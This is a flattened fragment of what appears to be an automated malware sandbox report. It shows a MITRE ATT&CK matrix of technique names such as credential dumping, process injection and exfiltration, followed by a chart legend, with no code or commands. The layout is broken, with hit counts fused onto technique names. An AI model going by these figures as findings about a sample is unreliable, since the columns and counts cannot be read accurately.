            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API
            1
            DLL Side-Loading
            11
            Process Injection
            11
            Masquerading
            1
            OS Credential Dumping
            21
            Security Software Discovery
            Remote Services1
            Email Collection
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            1
            Disable or Modify Tools
            LSASS Memory31
            Virtualization/Sandbox Evasion
            Remote Desktop Protocol1
            Archive Collected Data
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)31
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Application Window Discovery
            SMB/Windows Admin Shares1
            Data from Local System
            3
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Process Injection
            NTDS1
            System Network Configuration Discovery
            Distributed Component Object Model1
            Clipboard Data
            4
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information
            LSA Secrets13
            File and Directory Discovery
            SSHKeylogging15
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
            Obfuscated Files or Information
            Cached Domain Credentials215
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.